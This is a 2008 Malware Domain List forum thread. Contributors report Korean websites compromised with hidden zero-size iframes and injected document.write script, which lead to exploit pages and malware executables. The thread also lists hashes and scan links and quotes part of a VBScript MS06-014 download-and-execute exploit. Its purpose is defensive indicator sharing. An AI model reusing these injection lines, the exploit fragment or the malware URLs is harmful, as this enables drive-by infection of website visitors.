Malware Domain List
Malware Related => Malicious Domains => Topic started by: M.J.Kim on March 09, 2008, 02:13:04 pm
-
OnlineGames...
hxxp://219.84.165.51/ads/ad.htm
Download Malware Files.
-
hxxp://219.84.165.51/ads/sub.exe
-
Thank you both.
-
nice to meet you M.J.KIM ;D ;D ;D ;D
You mean:
1) hxxp://www.ontooniverse.com/
2) <iframe height=0 width=0 Src="hxxp://219.84.165.51/ads/ad.htm
"></iframe>
-
hxxp://www.ontooniverse.com/
<iframe height=0 width=0 Src="hxxp://219.84.165.168/ads/ad.htm"></iframe>
hxxp://219.84.165.168/ads/ad.exe
<iframe src=hxxp://61.100.185.23/MB/M.htm width=0 height=0></iframe>
hxxp://61.100.185.23/MB/M.exe
-
Thanks.
-
another website.
hxxp://www.onmoviestyle.com/channel/action/action_index.asp
<iframe height=0 width=0 Src="hxxp://219.84.165.168/ads/ad.htm"></iframe>
-
hxxp://www.ontooniverse.com/
<iframe src=hxxp://61.100.185.23/MB/X.htm width=0 height=0></iframe>
hxxp://61.100.185.23/MB/A.exe
-
changed url
(today(March 26, 2008, 06:59:01 PM) GMT+9)
hxxp://www.ontooniverse.com/
<iframe width=0 height=0 src=hxxp://bbn112.com/M.htm></iframe>
hxxp://bbn112.com/A.exe
<html>
<script language="VBScript">
on error resume next
dl = "hxxp://bbn112.com/A.exe"
Set df = document.createElement("ob"&"ject")
df.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983A-00C04FC29E36"
str="Microsoft"&".XMLHTTP"
...
but it don't work.
...
Sunset on ibiza _ likuida remix /* fantastic */
-
Thank you.
-
changed url
March 28, 2008, 07:09:01 PM) GMT+9
hxxp://www.ontooniverse.com/
<iframe width=0 height=0 src=hxxp://211.174.63.213/nw/L.htm></iframe>
hxxp://211.174.63.213/nw/X.exe
-
hxxp://www.songsari.com/
hxxp://www.songsari.com/js/FcScript.js
hxxp://www.songsari.com/js/http://219.84.165.139/ads/ad.htm
hxxp://219.84.165.139/ads/ad.exe
hxxp://www.onmoviestyle.com/index.asp
<iframe height=0 width=0 Src="hxxp://219.84.165.139/ads/ad.htm"></iframe>
hxxp://219.84.165.139/ads/ad.exe
hxxp://www.ontooniverse.com/
<iframe height=0 width=0 Src="hxxp://219.84.165.139/ads/ad.htm"></iframe>
hxxp://219.84.165.139/ads/ad.exe
hxxp://203.251.224.124/i/i/dmx.exe
-
hxxp://www.ontooniverse.com/
<iframe width=0 height=0 src=hxxp://220.95.231.187/win/X.htm></iframe>
hxxp://220.95.231.187/win/a.exe
-
Thank you.
-
<iframe width=0 height=0 src=hxxp://ebabyart.co.kr/fla/M.htm></iframe>
hxxp://ebabyart.co.kr/fla/A.exe
hxxp://ebabyart.co.kr/
hxxp://ebabyart.co.kr/inc/common.js
document.write('<iframe height=0 width=0 src="hxxp://ebabyart.co.kr/fla/M.htm"></iframe>');
-
hxxp://www.ontooniverse.com/
<iframe width=0 height=0 src=hxxp://phi.or.kr/memo/T.htm></iframe>
hxxp://phi.or.kr/memo/A.exe
MS06-014 exploit
-
hxxp://www.ontooniverse.com/
<iframe width=0 height=0 src=hxxp://inity.co.kr/web/X.htm></iframe>
hxxp://inity.co.kr/web/a.exe
-
Thanks.
-
hxxp://www.ontooniverse.com/
<iframe width=0 height=0 src=hxxp://the5.com/new/index.htm></iframe>
hxxp://the5.com/new/A.exe
a. MS06-014 exploit
b. A.exe - MD5 : a2080bb106241e1e6aa3e97c8fe8eabc
-
may 7, 2008, 04:33:24 PM GMT+9
hxxp://www.ontooniverse.com/y_main_4.asp
<iframe width=0 height=0 src=hxxp://www.boheomin.co.kr/sian/H.htm></iframe>
hxxp://www.boheomin.co.kr/sian/a.exe
hxxp://www.boheomin.co.kr/
<iframe width=0 height=0 src=hxxp://the5.com/new/index.htm></iframe>
hxxp://the5.com/new/a.exe
-
Thanks.
-
may 11, 2008, 12:55:24 PM GMT+9
hxxp://www.ontooniverse.com/y_main_4.asp
<iframe width=0 height=0 src=hxxp://onflashgame.kr/swf/M.htm></iframe>
exe = "hxxp://onflashgame.kr/swf/A.exe"
-
Thank you.
-
hxxp://www.ontooniverse.com/y_main_4.asp
<iframe width=0 height=0 src=hxxp://yanbianitman.or.kr/Test/index.htm></iframe>
<iframe width=0 height=0 src=hxxp://yanbianitman.or.kr/Test/H.htm></iframe>
hxxp://yanbianitman.or.kr/Test/A.exe
<iframe width=0 height=0 src=hxxp://yanbianitman.or.kr/Test/H1.htm></iframe>
hxxp://yanbianitman.or.kr/Test/B.exe
-
hxxp://www.ontooniverse.com/y_main_4.asp
<script src=hxxp://211.58.241.36/mpv.js></script>
<iframe width=0 height=0 src=hxxp://www.bitfas.com/pop/index.htm></iframe>
<iframe width=0 height=0 src=http://www.bitfas.com/pop/T.htm></iframe>
hxxp://www.bitfas.com/pop/A.exe
<iframe width=0 height=0 src=http://www.bitfas.com/pop/T1.htm></iframe>
hxxp://www.bitfas.com/pop/B.exe
.
.
-
Thanks.
-
hxxp://www.ontooniverse.com/y_main_4.asp
<iframe width=0 height=0 src=hxxp://www.wppa.co.kr/DB/index.htm></iframe><html>
<iframe width=0 height=0 src=hxxp://www.wppa.co.kr/DB/M.htm></iframe>
hxxp://www.wppa.co.kr/DB/D.exe
<iframe width=0 height=0 src=http://www.wppa.co.kr/DB/M1.htm></iframe>
hxxp://www.wppa.co.kr/DB/W.exe
-
Thank you.
-
hxxp://ontooniverse.com/y_main_4.asp
hxxp://tossm.com/link/index.htm
hxxp://tossm.com/link/H.htm
hxxp://tossm.com/link/W.exe
hxxp://tossm.com/link/H1.htm
hxxp://tossm.com/link/D.exe
-
Thanks.
-
hxxp://www.ontooniverse.com/y_main_4.asp
<iframe width=0 height=0 src=hxxp://tossm.com/link/index.htm></iframe>
<iframe width=0 height=0 src=hxxp://tossm.com/link/H.htm></iframe>
hxxp://tossm.com/link/W.exe
<iframe width=0 height=0 src=hxxp://tossm.com/link/H1.htm></iframe>
hxxp://tossm.com/link/D.exe
May 30, 2008, 11:46 PM
from Seoul, Korea, Good-night ;D ;D ;D
-
hxxp://211.58.241.36/top.htm
hxxp://218.234.18.143:8080/client/File/dll.exe
-
hxxp://www.ontooniverse.com/y_main_4.asp
<script language=javascript src=hxxp://211.42.194.7/test/1.js></script><html>
document.write('<iframe height=0 width=0 src="hxxp://211.42.194.7/test/X.htm"></iframe>');
hxxp://211.42.194.7/test/X.exe
document.write('<iframe height=0 width=0 src="hxxp://211.42.194.7/test/XX.htm"></iframe>');
hxxp://211.42.194.7/test/XX.exe
-
Thanks.
-
1. 2008/6/22
hxxp://www.ontooniverse.com/y_main_4.asp
<script language=javascript src=hxxp://211.42.194.7/test/1.js></script><html>
document.write('<iframe height=0 width=0 src="hxxp://211.42.194.7/test/X.htm"></iframe>');
hxxp://211.42.194.7/test/X.exe
document.write('<iframe height=0 width=0 src="hxxp://211.42.194.7/test/XX.htm"></iframe>');
hxxp://211.42.194.7/test/XX.exe
2. 2008/6/25
hxxp://ontooniverse.com/y_main_4.asp
<iframe width=0 height=0 src=hxxp://61.107.210.11/my/HH.htm></iframe><html>
hxxp://www.ontooniverse.com/Lib/jscript/common.js
document.write('<iframe height=0 width=0 src="hxxp://121.0.119.203/index.html"></iframe>');
hxxp://ontooniverse.com/y_main_4.asp
<script language=javascript src=hxxp://61.107.210.11/my/1.js></script>
hxxp://61.107.210.11/my/T.htm
hxxp://61.107.210.11/my/T.exe
hxxp://61.107.210.11/my/TT.htm
hxxp://61.107.210.11/my/TT.exe
hxxp://www.ontooniverse.com/Lib/jscript/common.js
document.write('<iframe height=0 width=0 src="hxxp://222.122.138.111/temp/006/index.html"></iframe>');
hxxp://222.122.138.111/temp/006/h.exe
3. 2008/6/28
hxxp://www.ontooniverse.com/y_main_4.asp
<iframe height=0 width=0 src="hxxp://61.82.71.36/index.htm"></iframe>
hxxp://61.82.71.36/h.exe
V3 : Win-Trojan/LineageHack.91857
-
Thanks.
-
hxxp://www.ontooniverse.com/y_main_4.asp
hxxp://203.245.160.14/O/H.htm
hxxp://203.245.160.14/O/H.exe
hxxp://www.ontooniverse.com/y_main_5.asp
hxxp://211.239.157.205/swf/X.htm
hxxp://211.239.157.205/swf/X.exe
-
Thanks.
-
hxxp://www.ontooniverse.com/y_main_5.asp
hxxp://211.239.157.205/swf/II.htm
hxxp://juli.vaivai.net/BT/111/br.exe
- NOD32, V3, VirusChaser(Dr.Web) : .
- MD5 : 43452a6aeee88124ad04a1f547f06d59
- suspicious file.
-
hxxp://www.sovo.co.kr/poll/T.htm
<iframe width=0 height=0 src=hxxp://www.sovo.co.kr/poll/A.htm></iframe>
hxxp://www.sovo.co.kr/poll/A.exe
hxxp://www.sovo.co.kr/poll/TT.htm
<iframe width=0 height=0 src=hxxp://www.sovo.co.kr/poll/AA.htm></iframe>
hxxp://www.sovo.co.kr/poll/AA.exe
hxxp://www.ontooniverse.com/Lib/jscript/common_new.js
document.write('<iframe height=0 width=0 src="hxxp://116.193.89.27/index.htm"></iframe>');
hxxp://211.174.62.82/h.exe
-
Thanks.
-
hxxp://www.ontooniverse.com/Lib/jscript/common_new.js
document.write('<iframe height=0 width=0 src="hxxp://61.74.73.136/index.htm"></iframe>');
hxxp://61.74.73.136/T.exe
hxxp://www.onmoviestyle.com/acecounter/acecounter_mainscript.js
doucment.write('<ifarme height=0 width=0 src="hxxp://61.74.73.136/index.htm"></ifarme>');
hxxp://61.74.73.136/T.exe
hxxp://www.mbcgame.co.kr/
hxxp://www.mbcgame.co.kr/js/flash.js
document.write('<iframe height=0 width=0 src="hxxp://61.74.73.136/index.htm"></iframe>');
hxxp://61.74.73.136/T.exe
-
http://www.virustotal.com/analisis/45f3a4df7287e7c5c2ad5acbe6db68fc
most already detect it :)
the t.exe that is :)
threatexpert of it
http://www.threatexpert.com/report.aspx?md5=2aa090edee6ce80718b0be14da85bcc2
md5:0x2AA090EDEE6CE80718B0BE14DA85BCC2
-
Thnak you for reply Kayrac. ;D ;D ;D
hxxp://movie.fileguri.com/common/js/ajax2.js
document.write('<iframe height=0 width=0 src="hxxp://pay.topservice.co.kr/index.htm"></iframe>');
hxxp://pay.topservice.co.kr/T.exe
-
hxxp://www.ontooniverse.com/
hxxp://www.ontooniverse.com/tooniland_notice.asp
hxxp://218.55.99.144/index.htm
hxxp://218.55.99.144/WV.exe
-
http://www.virustotal.com/analisis/66fe0d2e554d14dc0e0f137bdd4749b5
for wv :)
poorly detected, i sent it around :)
-
Thank you :)